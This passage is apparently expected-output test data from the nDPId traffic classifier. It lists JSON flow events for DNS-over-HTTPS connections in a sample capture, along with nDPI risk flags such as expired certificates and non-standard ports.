ZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIKQoxhH\/Z4NdCHDs7qK8wmGbCtHgbBpAtyYYPJoz0BNpCAQBAI2s5yjtMrI9QJNozqSEdCsumaSKt\/QNxoJ5PFMWs10MAWl+5CjGLSlpjhytuQkP602gJ28TSQHyyO39DQ2pHRZ1MjKiwLUGQnSrx7B1qsIRx8U65WEhaQ\/Oefjv8VGGg2Nnh0hcGrHjYUxlGavnUge+GnGDrvgzWTdBb6fu\/ASgdFWYo\/L\/cx\/DQSF7KqdfFLYtqS\/mVGjCi+aU3DGzfokfH8gTddjOpZA9DbKNE5R+fiOUj+uHJsETXL1+AHkZ1DyEVNTPTtlzClPqiVFZoiQLHaM5Rks\/r\/SATzjVrNW7MyikygwLvRY4rKK4uz5N88k\/vqkRvVB4EA04vef95bIWAwMABA4AAAA="} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority 
X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
